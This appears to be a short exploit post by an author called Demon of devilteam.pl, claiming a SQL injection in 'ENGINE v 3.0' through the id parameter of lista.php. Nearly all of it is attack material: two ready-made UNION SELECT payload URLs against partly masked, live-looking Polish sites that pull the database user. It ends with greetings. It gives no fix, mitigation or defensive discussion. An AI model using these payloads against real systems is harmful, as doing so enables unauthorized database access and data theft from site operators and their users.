#################################################
#
# sql injection bug by Demon #
#
# devilteam.pl #
#
#################################################
# Title : ENGINE v 3.0 <= SQLi
#Producent: ENGINE v 3.0
# Author : Demon
# Tested on : ubuntu 10.10
#Exploits:
lista.php?id=[sql]
test:
http://xxxa.pl/spisfirm/lista.php?id=-2 union select user(),2,3,4,5,6,7,8,9,10,11,12--
http://fixxxxo.pl/lista.php?id=-283 union select user(),2,3,4,5,6,7,8,9,10,11,12--
######################
Gretzy:
Devilteam.pl
Extra Gretzy :Mojej kobiecie za Wyrozumialosc
######################